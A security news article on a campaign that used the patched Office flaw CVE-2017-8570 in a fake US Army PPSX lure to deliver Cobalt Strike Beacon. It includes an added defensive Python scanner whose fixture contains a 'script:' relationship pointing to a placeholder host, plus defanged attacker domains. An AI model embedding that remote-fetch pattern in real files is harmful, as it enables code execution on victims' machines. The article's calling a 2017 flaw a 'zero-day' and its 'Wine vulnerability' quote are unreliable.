7-Year-Old 0-Day in Microsoft Office Exploited to Drop Cobalt Strike

By Deeba Ahmed

Hackers are dusting off old tricks! A recent attack exploited vulnerabilities in systems running outdated Microsoft Office to deliver Cobalt Strike malware. Learn how to protect yourself!

HackRead

Cybersecurity firm Deep Instinct has discovered that attackers are reviving old, long-patched exploits to deliver a custom Cobalt Strike loader, a relatively new trend. Let’s delve deeper into this.

Deep Instinct Threat Lab has discovered a targeted operation against Ukraine in which hackers use an old zero-day vulnerability, CVE-2017-8570, as the initial vector and a custom loader for Cobalt Strike Beacon, the payload of a commercial pen-testing tool that red teams use to evaluate computer security. In this attack, however, the hackers used a cracked copy with no legitimate licensee.

They exploited CVE-2017-8570, a Microsoft Office vulnerability disclosed in 2017, to launch Cobalt Strike Beacon on systems in Ukraine. The lure was a malicious PPSX (PowerPoint Slideshow) file disguised as an old US Army instruction manual for mine-clearing tank blades. Inside the file, the remote resource was referenced with a “script:” prefix before its HTTPS URL, which helped it bypass traditional security measures, hid the payload and complicated analysis.
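The “script:” prefix the article mentions lives in the document’s relationship parts, and that makes it something a defender can look for at the mail gateway or in triage. The following is an added example, not code from HackRead or Deep Instinct: it unpacks an OOXML presentation (PPSX/PPTX are zip archives), walks every `.rels` part, and flags any relationship whose Target starts with the `script:` scheme, plus the lower-confidence case of an external OLE-object relationship. The two sample documents are constructed inline as fixtures; `stage.invalid` and `example.invalid` are placeholder hostnames, not indicators from the report.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship namespace; every *.rels part in the package uses it.
RELS_NS = "{http://schemas.openxmlformats.org/package/2006/relationships}"
OLE_REL_TYPE_SUFFIX = "/relationships/oleObject"


def find_suspicious_relationships(document_bytes):
    """Scan an OOXML zip and return (part, rel_id, target, reason) tuples.

    A relationship is reported when its Target uses the "script:" moniker
    prefix (no legitimate OOXML target uses that scheme) or when it is an
    external OLE-object link (legitimate but rare, so a weaker signal).
    Malformed .rels parts are skipped rather than treated as clean."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(document_bytes)) as archive:
        for part in archive.namelist():
            if not part.lower().endswith(".rels"):
                continue
            try:
                root = ET.fromstring(archive.read(part))
            except ET.ParseError:
                continue  # unparseable rels part: out of scope for this check
            for rel in root.iter(RELS_NS + "Relationship"):
                target = (rel.get("Target") or "").strip()
                rel_type = rel.get("Type") or ""
                external = rel.get("TargetMode", "Internal") == "External"
                scheme = target.split(":", 1)[0].lower() if ":" in target else ""
                if scheme == "script":
                    reason = "script: moniker prefix on relationship target"
                elif external and rel_type.endswith(OLE_REL_TYPE_SUFFIX):
                    reason = "external OLE object relationship"
                else:
                    continue
                findings.append((part, rel.get("Id", ""), target, reason))
    return findings


def build_sample_presentation(slide_rels_xml):
    """Constructed fixture: a minimal zip laid out like a presentation
    package with one slide and its relationship part. Not a real document."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as archive:
        archive.writestr("[Content_Types].xml",
                         "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        archive.writestr("ppt/slides/slide1.xml",
                         "<p:sld xmlns:p='http://schemas.openxmlformats.org/presentationml/2006/main'/>")
        archive.writestr("ppt/slides/_rels/slide1.xml.rels", slide_rels_xml)
    return buf.getvalue()


# Constructed benign rels part: a layout reference and an ordinary hyperlink.
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.invalid/manual" TargetMode="External"/>
</Relationships>"""

# Constructed suspicious rels part: an external OLE object whose target
# carries the "script:" prefix described in the article (placeholder host).
SUSPICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/>
  <Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject" Target="script:https://stage.invalid/lure" TargetMode="External"/>
</Relationships>"""


def scan_samples():
    """Run the check over both constructed fixtures and return the results."""
    return {
        "benign": find_suspicious_relationships(build_sample_presentation(BENIGN_RELS)),
        "suspicious": find_suspicious_relationships(build_sample_presentation(SUSPICIOUS_RELS)),
    }


if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label}: {len(hits)} finding(s)")
        for part, rel_id, target, reason in hits:
            print(f"  {part} {rel_id} -> {target} [{reason}]")
```

The `script:` match is the high-confidence rule: the target scheme is compared case-insensitively after stripping whitespace, so trivial casing variants do not slip through. The external OLE rule is kept separate and labelled as a weaker reason, because some legitimate documents do link OLE objects externally; in practice it is a triage flag rather than a block decision.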

“The lure contained military-related content, suggesting it was targeting military personnel. But the domain names weavesilk(.)space and petapixel(.)fun are disguised as an obscure generative art site (weavesilk(.)com) and a popular photography site (petapixel(.)com). These are unrelated, and it’s a bit puzzling why an attacker would use these specifically to fool military personnel.”

Deep Instinct

The use of a Cobalt Strike loader, a versatile post-exploitation toolset commonly abused in targeted attacks, suggests a sophisticated approach by the attackers. Cobalt Strike allows adversaries to deploy malware, steal data, and maintain persistence on compromised systems. In the Ukraine operation, the old exploit is the delivery mechanism that puts Cobalt Strike Beacon on the victim’s machine, maximizing the impact of the initial compromise.

Deep Instinct’s research indicates that attackers are actively leveraging zero-day exploits, which are vulnerabilities unknown to security software vendors. This makes them particularly dangerous as traditional defences may not be able to detect and block them.

Researchers couldn’t attribute the attacks to any known threat actor or rule out the possibility of a red team exercise. Evidence indicates the sample was uploaded from Ukraine, the second stage was hosted under a Russian VPS provider, and the Cobalt beacon C&C was registered in Warsaw, Poland.

“Given the n-day exploitation trends against > 12-month-old edge device and email server CVEs we’ve seen over the past 4 years, seeing a threat actor exploit a Wine vulnerability from 2017 is weirdly refreshing,” stated Casey Ellis, Founder and Chief Strategy Officer at Bugcrowd.

“The use of undocumented low-level WinAPI calls is unusual as well. I can understand why threat analysts are having difficulty with attribution; it’s an esoteric and somewhat nerdy kill chain,” Casey explained.

“Aside from the technical pieces, the fact that it’s not Russia is noteworthy, and the TTPs suggest a previously unknown player. Cobalt Strike usage as a C2 is fairly commonplace, and the key takeaway here is that old vulnerabilities in easily forgotten software still matter.”

How to Stay Safe?

Deep Instinct’s research suggests that traditional security solutions may not be enough against zero-day exploits. Organizations should adopt advanced threat detection based on behavioural analysis and machine learning. Vigilance is also crucial, especially against cyber threats targeting Ukraine, as is a proactive defence strategy that combines firewalls and antivirus software.
